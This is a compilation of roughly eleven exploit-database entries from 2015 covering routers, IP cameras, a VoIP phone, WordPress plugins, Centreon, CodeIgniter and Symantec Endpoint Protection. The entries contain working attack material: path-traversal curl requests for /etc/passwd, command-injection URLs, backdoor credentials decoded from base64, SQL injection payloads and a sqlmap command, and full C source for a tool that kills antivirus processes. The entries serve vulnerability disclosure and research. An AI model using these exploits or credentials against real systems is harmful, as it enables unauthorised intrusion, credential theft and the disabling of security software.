
-
CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass
source: https://www.securityfocus.com/bid/54620/info CodeIgniter is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass XSS filter protections and perform cross-site scripting attacks. CodeIgniter versions prior to 2.1.2 are vulnerable. Build an application on CodeIgniter 2.1.0: // application/controllers/xssdemo.php <?php if ( ! defined('BASEPATH')) exit('No direct script access allowed'); class Xssdemo extends CI_Controller { public function index() { $data['xss'] = $this->security->xss_clean($this->input->post('xss')); $this->load->view('xssdemo', $data); } } // application/views/xssdemo.php <form method=post> <textarea name=xss><?php echo htmlspecialchars($xss); ?></textarea> <input type=submit /> </form> <p>XSS: <hr /> <?php echo $xss ?> Launch http://app-uri/index.php/xssdemo and try above vectors.
-
Cradlepoint MBR1400 and MBR1200 - Local File Inclusion
# Exploit Title: Cradlepoint MBR LFI # Date: 7/7/2015 # Exploit Author: Doc_Hak # Vendor Homepage: https://cradlepoint.com/ # Version: 1200/1400 (REQUIRED) # Tested on: Embedded linux I found a local file inclusion that reads files with root-level permissions on Cradlepoint routers. So far it appears to work on MBR1400 and MBR1200 routers, though others could be affected. I say it is root level because it can read /etc/passwd, and the password field contains no "x" indicating that the hash is stored in /etc/shadow; therefore the root hash is included directly in this file. To access the root hash on Cradlepoint MBRs simply: curl http://192.168.1.1/../../../../../../../../../../../../etc/passwd
-
WordPress Plugin chenpress - Arbitrary File Upload
source: https://www.securityfocus.com/bid/54635/info The chenpress plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. http://www.example.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
-
Symantec Endpoint Protection 12.1.4013 - Service Disabling
# Exploit Title: Antivirus # Google Dork: intitle: Antivirus # Date: 2015-07-07 # Exploit Author: John Page ( hyp3rlinx ) # Website: hyp3rlinx.altervista.org # Vendor Homepage: www.symantec.com # Software Link: www.symantec.com/endpoint-protection # Version:12.1.4013 # Tested on: windows 7 SP1 # Category: Antivirus Vendor: ================================ Symantec ( www.symantec.com ) Product: ================================ Symantec EP 12.1.4013 Advisory Information: ================================================ Disabling Vulnerability Vulnerability Details: ===================== Symantec EP agent & services can be rendered useless even after globally locking down endpoint protection via a Symantec central management server and enabling globally managed password protection controls. Tested successfully on Windows 7 SP1 result may vary OS to OS. Exploit code(s): =============== #include <windows.h> #include <Tlhelp32.h> #define SMC_EXE "Smc.exe" #define SMC_GUI "SmcGui.exe" #define CC_SVC_HST "ccSvcHst.exe" /* By John Page (hyp3rlinx) - Dec 2014 - hyp3rlinx.altervista.org Symantec Endpoint Protection version 12.1.4013 First reported to Symantec - Jan 20, 2015 Goal: Kill Symantec EP agent & services after globally locking down endpoint protection via the Symantec central management server and enabling globally managed password protection controls. Tested successfully on Windows 7 SP1 result may vary OS to OS. Scenario: Run the from browser upon download or save to some directory and run Not the most elegant code and I don't care... 
*/ void el_crookedio_crosso(const char *victimo){ HANDLE hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0); PROCESSENTRY32 pEntry; pEntry.dwSize=sizeof(pEntry); BOOL hRes=Process32First(hSnapShot,&pEntry); while(hRes){ if(strcmp(pEntry.szExeFile,victimo)==0){ HANDLE hProcess=OpenProcess(PROCESS_TERMINATE,0,(DWORD)pEntry.th32ProcessID); if (hProcess!=NULL){ TerminateProcess(hProcess,9); CloseHandle(hProcess); } } hRes=Process32Next(hSnapShot,&pEntry); } CloseHandle(hSnapShot); } DWORD exeo_de_pid(char *ghostofsin){ DWORD ret=0; PROCESSENTRY32 pe32={sizeof (PROCESSENTRY32)}; HANDLE hProcSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if (hProcSnap==INVALID_HANDLE_VALUE) return 0; if (Process32First (hProcSnap,&pe32)) do if (!strcmp(pe32.szExeFile,ghostofsin)) { ret=pe32.th32ProcessID; break; } while (Process32Next (hProcSnap,&pe32)); CloseHandle (hProcSnap); return ret; } void angelo_maliciouso(){ int AV=exeo_de_pid(SMC_EXE); char id[8]; sprintf(id, "%d ", AV); printf("%s", id); char cmd[50]="Taskkill /F /PID "; strcat(cmd, id); system(cmd); // system("Taskkill /F /IM Smc.exe"); //Access denied. 
system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp"); Sleep(1000); el_crookedio_crosso(SMC_EXE); el_crookedio_crosso(SMC_GUI); el_crookedio_crosso(CC_SVC_HST); } int main(void){ puts("/*-----------------------------------------------------------*/\n"); puts("| EXORCIST DE SYMANTEC Antivirus version 12.1.4013 |\n"); puts("| By hyp3rlinx - Jan 2015 |\n"); puts("/*------------------------------------------------------------*/\n"); SetDebugPrivileges(); angelo_maliciouso(); Sleep(1000); el_crookedio_crosso(SMC_EXE); el_crookedio_crosso(SMC_GUI); el_crookedio_crosso(CC_SVC_HST); Sleep(2000); angelo_maliciouso(); Sleep(6000); return 0; } int SetDebugPrivileges(){ DWORD err=0; TOKEN_PRIVILEGES Debug_Privileges; if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&Debug_Privileges.Privileges[0].Luid))return GetLastError(); HANDLE hToken=0; if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){ err=GetLastError(); if(hToken)CloseHandle(hToken); return err; } Debug_Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; Debug_Privileges.PrivilegeCount=1; if(!AdjustTokenPrivileges(hToken,FALSE,&Debug_Privileges,0,NULL,NULL)){ err=GetLastError(); if(hToken) CloseHandle(hToken); } return err; } Disclosure Timeline: ========================================================= Vendor Notification: Jan 20, 2015 July 7, 2015 : Public Disclosure Severity Level: ========================================================= High Description: ================================================================== Request Method(s): [+] Click Vulnerable Product: [+] Symantec Endpoint Protection version 12.1.4013 Vulnerable Parameter(s): [+] N/A Affected Area(s): [+] Smc.exe, SmcGui.exe & ccSvcHst.exe ====================================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is 
given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
-
WordPress Plugin WP E-Commerce Shop Styling 2.5 - Arbitrary File Download
Title: Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-05 Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling Vendor: https://profiles.wordpress.org/haet/ Vendor Notified: 2015-07-05, fixed in version 2.6. Vendor Contact: http://wpshopstyling.com Description: Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders. Vulnerability: The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize the user-supplied filename, so sensitive system files can be downloaded. 1 <?php 2 require_once("../../../../wp-admin/admin.php"); 3 4 header('Content-disposition: attachment; filename='.$_GET['filename']); 5 header('Content-type: application/pdf'); 6 readfile(HAET_INVOICE_PATH.$_GET['filename']); 7 ?> You'll have to rename the downloaded file, e.g. mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd, because the saved filename is derived from the download filename including its path. CVEID: Requested TBD OSVDB: TBD Exploit Code: • $ curl http://server/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd
-
AirLink101 SkyIPCam1620W - OS Command Injection
1. Advisory Information Title: AirLink101 SkyIPCam1620W OS Command Injection Advisory ID: CORE-2015-0011 Advisory URL: http://www.coresecurity.com/advisories/airlink101-skyipcam1620w-os-command-injection Date published: 2015-07-08 Date of last update: 2015-07-08 Vendors contacted: AirLink101 Release mode: User release 2. Vulnerability Information Class: OS Command Injection [CWE-78], Use of Hard-coded Credentials [CWE-798] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-2280 3. Vulnerability Description AirLink101 [2] SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera streams supreme quality MPEG4 and MJPEG images. It supports remote surveillance on computers over the Internet or on mobile handheld devices. The SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera [1] is vulnerable to an OS Command Injection Vulnerability in the snwrite.cgi binary. 4. Vulnerable Packages AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck (Aug. 2012) Other devices based on the same firmware are probably affected too, but they were not tested. 5. Vendor Information, Solutions and Workarounds Core Security recommends applying a WAF (Web Application Firewall) rule that would filter the vulnerable request (either the CGI file or the parameters where the injection is performed) in order to avoid exploitation. Contact the vendor for further information. 6. Credits This vulnerability was discovered and researched by Nahuel Riva from the Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from the Core Security Advisories Team. 7. Technical Description / Proof of Concept Code 7.1. 
OS Command Injection in CGI binary file [CVE-2015-2280] The snwrite.cgi binary has an OS Command Injection at function loc_8928 when handling the "mac" parameter: .text:00008928 .text:00008928 loc_8928 .text:00008928 BL memset .text:0000892C LDR R3, [R7,#0x40] .text:00008930 LDR R2, =stderr .text:00008934 ADD R3, R5, R3 .text:00008938 LDR R0, [R2] ; stream .text:0000893C LDR R1, =aMacS ; "mac = %s" .text:00008940 LDR R2, [R3,#0x104] .text:00008944 BL fprintf .text:00008948 LDR R2, [R7,#0x40] .text:0000894C ADD R2, R5, R2 .text:00008950 LDR R3, [R2,#0x104] .text:00008954 MOV R1, #0x80 ; maxlen .text:00008958 LDR R2, =aEtcInit_dMacwr ; "/etc/init.d/macwrite.sh %s 1>/dev/null "... .text:0000895C MOV R0, R8 ; s .text:00008960 BL snprintf .text:00008964 MOV R0, R8 ; command .text:00008968 BL system .text:0000896C LDR R4, [R7,#0x40] .text:00008970 B loc_8908 .text:00008970 ; End of function sub_88A8 .text:00008970 The "mac" parameter is used in a snprintf() call to build a command that executes the macwrite.sh shell script to update the MAC address configuration. The snprintf()-built string is then passed to a system() call. Therefore, it is possible to inject arbitrary commands just by putting a ";" after the "mac" parameter, for example: http://<Camera_IP>/maker/snwrite.cgi?mac=1234;ps In order to invoke the snwrite.cgi binary valid credentials are required, but a backdoor account located in /server/usr.ini can be used: nriva@fastix:/mnt/firmware/server$ cat usr.ini admin=Basic YWRtaW46YWRtaW4= maker=Basic cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl These accounts are only base64-encoded, so it is trivial to recover them: >>> "YWRtaW46YWRtaW4=".decode("base64") 'admin:admin' >>> "cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl".decode("base64") 'productmaker:ftvsbannedcode' Using the 'productmaker:ftvsbannedcode' backdoor account allows access to the path /maker/snwrite.cgi and therefore the ability to perform the injection explained above. 8. 
Report Timeline 2015-05-04: Core Security sent an initial email notification to AirLink101. Publication date set to June 8, 2015. 2015-05-07: Core Security sent another email notification to AirLink101. 2015-05-14: Core Security attempted to contact AirLink101 through Twitter. 2015-05-14: Core Security sent yet another email notification to AirLink101. 2015-05-14: AirLink101 replied with a direct Twitter message asking Core to resend the email. 2015-05-14: Core Security informed AirLink101 through Twitter that they resent the email. 2015-05-15: Core Security asked AirLink101 through Twitter if they were able to find the email they sent. 2015-05-18: Core Security again asked AirLink101 through Twitter if they received the email. 2015-05-19: AirLink101 replied to Core on Twitter saying that they received the email and were reviewing the situation. 2015-05-20: Core Security replied AirLink101 with a direct Twitter message stating that they needed their reply soon in order to coordinate the advisory publication. 2015-05-21: AirLink101 wrote an email requesting that Core share the model and the issue they found, and requesting a contact phone number. 2015-05-22: Core Security replied to AirLink101 by email and asked if they had a PGP key or if they preferred the report to be sent in plain text. Additionally, Core informed AirLink101 that it is their policy to communicate exclusively via email in order to keep a record. 2015-05-22: AirLink101 replied by email and asked when the advisory would be published without answering the previous question (PGP or plain text) and asked again for a contact phone number. 2015-05-26: Core Security replied to AirLink101 by email clarifying that they previously requested their input on whether they would prefer to receive the information encrypted or in plain text, and explained again that it is their policy to communicate using email. 2015-05-28: Core Security asked AirLink101 by email if they received their previous message. 
2015-06-04: Core Security again asked AirLink101 if they were receiving their emails. They informed Airlink101 that if they didn't receive an answer soon they would be forced to publish their findings as a user release. 2015-06-16: Core Security informed AirLink101 that if they didn't receive an answer that week they would be forced to publish their findings. 2015-06-18: Core Security informed AirLink101 that it was their last chance to answer their emails, if not the advisory was going to be published on June 23, 2015. 2015-07-08: Advisory CORE-2015-0011 published. 9. References [1] http://airlink101.com/products/aic1620w.php. [2] http://www.airlink101.com/. 10. About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. About Core Security Technologies Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. 
Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. Disclaimer The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. PGP/GPG Keys This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-
Immunity Debugger 1.85 - Crash (PoC)
# Title: Immunity Debugger - Crash # Date: 08/07/2015 # Author: Arsyntex # Vendor Homepage: http://www.immunityinc.com/products/debugger/ # Version: v1.85 # Tested on: Windows 8.1 Pro Incorrect path/file extension parsing. -Create a folder named .exe.exe, put any program inside it and try to debug it. -Try to debug an executable named test.exe.exe or lib.exe.dll The "OpenEXEfile" function does not check whether strchr() returned NULL before the result is passed to strlen(). ---------------------------------------------------------------------------------- loc_4B8182: mov [esp+10h+var_10], edi add edi, 4 mov [esp+10h+var_C], 20h mov [esp+10h+arg_24], eax call strchr ; return EAX= 0 mov [esp+10h+var_10], eax mov [esp+10h+arg_28], eax ; (!) call strlen ; ntdll.strlen(s) --------------------------------------------------------------------- ntdll.strlen(s) - NULL parameter --------------------------------------------------------------------- ntdll_strlen: mov ecx, [esp+4] ; [esp+4] = 0 NULL pointer test ecx, 3 ; ... jz short loc_77C77510 ; jump ... loc_77C77510: mov eax, [ecx] ; Access Violation ---------------------------------------------------------------------
-
Centreon 2.5.4 - Multiple Vulnerabilities
Merethis Centreon - Unauthenticated blind SQLi and Authenticated Remote Command Execution CVEs: CVE-2015-1560, CVE-2015-1561 Vendor: Merethis - www.centreon.com Product: Centreon Version affected: 2.5.4 and prior Product description: Centreon is the choice of some of the world's largest companies and mission-critical organizations for real-time IT performance monitoring and diagnostics management. (from https://www.centreon.com/en/) Advisory introduction: Centreon 2.5.4 is susceptible to multiple vulnerabilities, including unauthenticated blind SQL injection and authenticated remote system command execution. Credit: Huy-Ngoc DAU of Deloitte Conseil, France ================================ Finding 1: Unauthenticated Blind SQL injection in isUserAdmin function (CVE-2015-1560) ================================ The vulnerable function is "isUserAdmin" (defined in include/common/common-Func.php), in which the unsanitized "sid" GET parameter is used in an SQL query. PoC: https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?si d=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27 https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?si d=%27%2Bif(1%3C0,sleep(1),%27%27)%2B%27 By exploiting CVE-2015-1560, an attacker can obtain, among other things, a valid session_id, which is required to exploit CVE-2015-1561. ================================ Finding 2: Authenticated Command Execution in getStats.php (CVE-2015-1561) ================================ The $command_line variable, which is passed to the popen() function, is constructed from unsanitized GET parameters. 
PoC (a valid session_id value is required): - Reading /etc/passwd by injecting a command into the "ns_id" parameter: http://example.domain/centreon/include/Administration/corePerformance/ge tStats.php?ns_id=|+more+/etc/passwd+%23&key=active_service_check&start=t oday&session_id=[valid session_id] - Injecting "uname -a" into the "end" parameter: http://example.domain/centreon/include/Administration/corePerformance/ge tStats.php?ns_id=1&key=active_service_check&start=today&end=|+uname+-a+% 23&session_id=[valid session_id] By combining the two vulnerabilities, an unauthenticated attacker can take control of the web server. ================================ Timeline ================================ 26/01/2015 - Vulnerabilities discovered 29/01/2015 - Vendor notified 05/02/2015 - Vendor fixed SQLi 13/02/2015 - Vendor fixed RCE References Vendor fixes: - SQLi : https://forge.centreon.com/projects/centreon/repository/revisions/d14f213b9c60de1bad0b464fd6403c828cf12582 - Command execution : https://forge.centreon.com/projects/centreon/repository/revisions/d14f213b9c60de1bad0b464fd6403c828cf12582 About Deloitte: Deloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms. In France, Deloitte SAS is the member firm of Deloitte Touche Tohmatsu Limited, and professional services are provided by its subsidiaries and affiliates. Our Enterprise Risk Services practice is made up of over 11,000 professionals providing services relating to security, privacy & resilience; data governance and analytics; information and controls assurance; risk management technologies; and technology risk & governance. 
We help organizations build value by taking a "Risk Intelligent" approach to managing financial, technology, and business risks.
-
Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities
The Grandstream GXV3275 is an Android-based VoIP phone. Several vulnerabilities were found affecting this device. * The device ships with a default root SSH key, which could be used as a backdoor: /system/root/.ssh # cat authorized_keys Public key portion is: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgwCIcYbgmdHTpTeDcBA4IOg5Z7d2By0GXGihZzcTxZC+YTWGUe/HJc+pYDpDrGMWg0hMqd+JPs1GaLNw4pw0Mip6VMT7VjoZ8Z+n2ULNyK1IoTU4C3Ea4vcYVR8804Pvh9vXxC0iuMEr1Jx7SewUwSlABX04uVpEObgnUhpi+hn/H34/ jhzhao@jhzhao-Lenovo Fingerprint: md5 7b:6e:a0:00:19:54:a6:39:84:1f:f9:18:2e:79:61:b5 This issue has not been resolved. * The SSH interface only provides access to a limited CLI. The CLI's ping and traceroute commands will pass user input as parameters to underlying system commands without escaping shell metacharacters. This can be exploited to break out to a shell: GXV3275 > traceroute $(sh) This shell will only see stderr, so we then need to run sh with stdout redirected to stderr: sh 1>&2 This issue has been resolved in firmware version 1.0.3.30. * The web interface exposes an undocumented command execution API: http://DEVICEIP/manager?action=execcmd&command=echo%20%22hello%22%20%3E%20/system/root/test.txt This issue has been resolved in firmware version 1.0.3.30. * The web interface allows unprivileged users to escalate privileges by modifying a cookie on the client side: javascript:void(document.cookie="type=admin") Full details are available here: http://davidjorm.blogspot.com/2015/07/101-ways-to-pwn-phone.html MITRE was contacted repeatedly requesting CVE names for these issues, but never replied. David
-
AirLive (Multiple Products) - OS Command Injection
1. Advisory Information Title: AirLive Multiple Products OS Command Injection Advisory ID: CORE-2015-0012 Advisory URL: http://www.coresecurity.com/advisories/airlive-multiple-products-os-command-injection Date published: 2015-07-06 Date of last update: 2015-07-06 Vendors contacted: AirLive Release mode: User release 2. Vulnerability Information Class: OS Command Injection [CWE-78], OS Command Injection [CWE-78] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-2279, CVE-2014-8389 3. Vulnerability Description AirLive MD-3025 [3], BU-3026 [4], BU-2015 [2], WL-2000CAM [5] and POE-200CAM [6] are IP cameras designed for professional surveillance and security applications. The built-in IR LEDs provide high quality nighttime monitoring. These AirLive [1] devices are vulnerable to an OS Command Injection Vulnerability. In the case of the MD-3025, BU-3026 and BU-2015 cameras, the vulnerability lies in the cgi_test.cgi binary file. In the case of the WL-2000CAM and POE-200CAM cameras, the command injection can be performed using the vulnerable wireless_mft.cgi binary file. 4. Vulnerable Packages AirLive BU-2015 with firmware 1.03.18 16.06.2014 AirLive BU-3026 with firmware 1.43 21.08.2014 AirLive MD-3025 with firmware 1.81 21.08.2014 AirLive WL-2000CAM with firmware LM.1.6.18 14.10.2011 AirLive POE-200CAM v2 with firmware LM.1.6.17.01 Other devices may be affected too, but they were not checked. 5. Vendor Information, Solutions and Workarounds Core Security recommends to apply a WAF (Web Application Firewall) rule that would filter the vulnerable request (either the CGI file or the parameters where the injection is performed) in order to avoid exploitation. Contact the vendor for further information. 6. Credits These vulnerabilities were discovered and researched by Nahuel Riva from Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Security Advisories Team. 7. 
Technical Description / Proof of Concept Code 7.1. OS Command Injection in cgi_test.cgi when handling certain parameters [CVE-2015-2279] There is an OS Command Injection in the cgi_test.cgi binary file in the AirLive MD-3025, BU-3026 and BU-2015 cameras when handling certain parameters. That specific CGI file can be requested without authentication, unless the user specified in the configuration of the camera that every communication should be performed over HTTPS (not enabled by default). The vulnerable parameters are the following: write_mac write_pid write_msn write_tan write_hdv These parameters are used to invoke another binary file called "info_writer". The sub_93F4 function reads the "QUERY_STRING" environment variable and checks whether it contains any of the parameters followed by an ampersand symbol: sub_93F4 STMFD SP!, {R4-R7,LR} LDR R0, =aQuery_string ; "QUERY_STRING" SUB SP, SP, #4 BL getenv MOV R1, #0 ; c MOV R2, #0x12 ; n MOV R6, R0 LDR R0, =unk_14B70 ; s BL memset LDR R0, =aContentTypeTex ; "Content-type: text/html\n\n<body>" BL printf MOV R5, #0 LDR R7, =off_B7D0 MOV R4, R5 B loc_943C [...] loc_9540 ; jumptable 00009470 case 7 MOV R0, R6 LDR R1, =aWrite_pid ; "write_pid&" BL strstr CMP R0, #0 BEQ loc_94CC ; jumptable 00009470 default case [...] It then uses whatever appears after the ampersand symbol in a call to sprintf() to build the command line with which the "info_writer" binary will be invoked. Finally, it calls the system() function: [...] .text:00009730 loc_9730 ; CODE XREF: .text:00009714j .text:00009730 MOV R2, R5 .text:00009734 LDR R1, =aOptIpncInfo__1 ; "/opt/ipnc/info_writer -p %s > /dev/null" .text:00009738 MOV R0, SP .text:0000973C BL sprintf .text:00009740 MOV R0, SP .text:00009744 BL system .text:00009748 MOV R2, R5 .text:0000974C LDR R1, =aWrite_pidOkPid ; "WRITE_PID OK, PID=%s\r\n" .text:00009750 LDR R0, =unk_1977C .text:00009754 MOV R4, SP .text:00009758 BL sprintf .text:0000975C B loc_9728 [...] 
Consequently, if a semicolon (;) is used after the ampersand symbol, arbitrary commands can be injected into the operating system. It's important to take into account that depending on the parameter used, there are checks like this (corresponding to the write_pid parameter): .text:00009708 MOV R0, R5 .text:0000970C BL strlen .text:00009710 CMP R0, #9 This verifies that the parameter has a specific length. Because of this, the injection is somewhat limited. Nevertheless, there are possible commands that can be executed, for example: Proof of Concept: http://<Camera-IP>:8080/cgi_test.cgi?write_tan&;ls&ls%20-la PoC Output: Write MAC address, model name, hw version, sn, tan, pid,firmware version -c => set system MAC address -m [MAC] => write MAC address -n [Model Name] => write Model Name -h [HW Version] => write HW Version -v [Firmware Version] => write Firmware Version -s [SN] => write SN -t [TAN] => write TAN -d [PID] => write PID -r [CR] => write Country Region -p => show current info. Content-type: text/html <body>WRITE_TAN OK, PID=;ls&ls%20- </body></html>3g.htm 485.htm SStreamVideo.cab ado.htm cfgupgrade.cgi cgi_test.cgi client.htm default.htm default_else.htm default_ie.htm default_m.htm default_nets.htm [...] 7.2. 
OS Command Injection in AirLive WL-2000CAM's wireless_mft.cgi binary file [CVE-2014-8389] The AirLive WL-2000CAM and POE-200CAM "/cgi-bin/mft/wireless_mft.cgi" binary file has an OS command injection in the "ap" parameter that can be exploited using the hard-coded credentials the embedded Boa web server has inside its configuration file: username: manufacture password: erutcafunam The following proof of concept copies the file where the user credentials are stored into the web server root directory: <a href="http://<Camera-IP>/cgi-bin/mft/wireless_mft?ap=testname;cp%20/var/www/secret.passwd%20/web/html/credentials">http://<Camera-IP>/cgi-bin/mft/wireless_mft?ap=testname;cp%20/var/www/...</a> Afterwards, the user credentials can be obtained by requesting: <a href="http://<Camera-IP>/credentials">http://<Camera-IP>/credentials</a> The credentials are only Base64-encoded, so it is easy to decode them and gain complete access to the device. 8. Report Timeline 2015-05-04: Core Security sent an initial email notification to AirLive. Publication date set to Jun 8, 2015. 2015-05-07: Core Security sent another email notification to AirLive. 2015-05-14: Core Security attempted to contact AirLive through Twitter. 2015-05-20: Core Security attempted to contact AirLive through Twitter again. 2015-06-16: Core Security sent another email and Twitter notification to AirLive. 2015-06-18: Core Security sent an email to Airlive explaining that this was their last opportunity to reply, if not the advisory was going to be published on June 23, 2015. 2015-07-06: Advisory CORE-2015-0012 published. 9. References [1] http://www.airlive.com. [2] http://www.airlive.com/product/BU-2015. [3] http://www.airlive.com/product/MD-3025. [4] http://www.airlive.com/product/BU-3026. [5] http://www.airlivecam.eu/manualy/ip_kamery/WL-2000CAM.pdf. [6] http://www.airlivesecurity.com/product.php?id=5#. 10. 
About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. About Core Security Technologies Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. Disclaimer The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. PGP/GPG Keys This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-
WordPress Plugin Easy2Map 1.24 - SQL Injection
Title: SQL Injection in easy2map wordpress plugin v1.24 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-08 Download Site: https://wordpress.org/plugins/easy2map Vendor: Steven Ellis Vendor Notified: 2015-06-08, fixed in v1.25 Vendor Contact: https://profiles.wordpress.org/stevenellis/ Advisory: http://www.vapid.dhs.org/advisory.php?v=131 Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity. Vulnerability: The following lines in Function.php use sprintf() to format queries being sent to the database, this doesn't provide proper sanitization of user input or properly parameterize the query to the database. 90 $wpdb->query(sprintf("UPDATE $mapsTable 91 SET PolyLines = '%s' 92 WHERE ID = '%s';", $PolyLines, $mapID)); . . . 163 $wpdb->query(sprintf(" 164 UPDATE $mapsTable 165 SET TemplateID = '%s', 166 MapName = '%s', 167 Settings = '%s', 168 LastInvoked = CURRENT_TIMESTAMP, 169 CSSValues = '%s', 170 CSSValuesList = '%s', 171 CSSValuesHeading = '%s', 172 MapHTML = '%s', 173 IsActive = 1, 174 ThemeID = '%s' 175 WHERE ID = %s;", 176 $Items['mapTemplateName'], 177 $Items['mapName'], 178 urldecode($Items['mapSettingsXML']), 179 urldecode($Items["mapCSSXML"]), 180 urldecode($Items["listCSSXML"]), 181 urldecode($Items["headingCSSXML"]), 182 urldecode($Items["mapHTML"]), 183 $Items['mapThemeName'], 184 $mapID)); 185 } else { 186 187 //this is a map insert 188 if (!$wpdb->query(sprintf(" 189 INSERT INTO $mapsTable( 190 TemplateID, 191 MapName, 192 DefaultPinImage, 193 Settings, 194 LastInvoked, 195 PolyLines, 196 CSSValues, 197 CSSValuesList, 198 CSSValuesHeading, 199 MapHTML, 200 IsActive, 201 ThemeID 202 ) VALUES ('%s', '%s', '%s', '%s', 203 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');", 204 $Items['mapTemplateName'], 205 $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) . 
"images/map_pins/pins/111.png", 206 urldecode($Items['mapSettingsXML']), '', 207 urldecode($Items["mapCSSXML"]), 208 urldecode($Items["listCSSXML"]), 209 urldecode($Items["headingCSSXML"]), 210 urldecode($Items["mapHTML"]), 211 $Items['mapThemeName']))) . . 267 $wpdb->query(sprintf(" 268 UPDATE $mapsTable 269 SET MapName = '%s', 270 LastInvoked = CURRENT_TIMESTAMP, 271 IsActive = 1 272 WHERE ID = %s;", $mapName, $mapID)); In MapPinImageSave.php, code isn’t sanitized when creating a directory allowing ../ to create files outside of intended directory: 4 $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/"; . . 11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) { 12 13 if (!file_exists($imagesDirectory)) { 14 mkdir($imagesDirectory); 15 } CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug) OSVDB: Exploit Code: • $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3
-
